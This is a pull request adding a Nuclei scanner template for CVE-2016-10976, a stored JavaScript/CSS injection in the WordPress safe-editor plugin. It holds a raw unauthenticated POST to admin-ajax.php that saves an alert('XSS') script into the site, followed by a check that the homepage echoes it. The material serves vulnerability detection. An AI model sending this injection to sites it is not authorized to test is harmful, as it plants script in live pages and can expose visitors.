### PR TITLE
Create CVE-2016-10976.yaml

### DIFF
--- a/http/cves/2016/CVE-2016-10976.yaml
+++ b/http/cves/2016/CVE-2016-10976.yaml
@@ -1,0 +1,50 @@
+id: CVE-2016-10976
+
+info:
+  name: safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
+  author: Splint3r7
+  severity: medium
+  description: When saving JS/CSS in this plugin then both private and public ajax-hooks are being used. Because of this anyone can post JS/CSS that are saved to the db and printed to the head and footer portion of the page.
+  remediation: |
+    Update to the latest version of safe-editor plugin or apply the patch provided by the vendor.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10976
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2016-10976
+    cwe-id: CWE-79
+    cpe: cpe:2.3:a:kodebyraaet:safe_editor:*:*:*:*:*:wordpress:*:*
+  metadata:
+    max-request: 1
+  tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        action=se_save&type=js&data=alert('XSS')
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'len(body) == 0'
+          - 'status_code == 200'
+
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "alert('XSS')"
+          
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

- Nuclei template for CVE-2016-10976

<img width="804" alt="Screenshot 2024-10-31 at 11 59 42 AM" src="https://github.com/user-attachments/assets/4b609b9f-c58e-44c7-b595-954a7c5b6942">

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)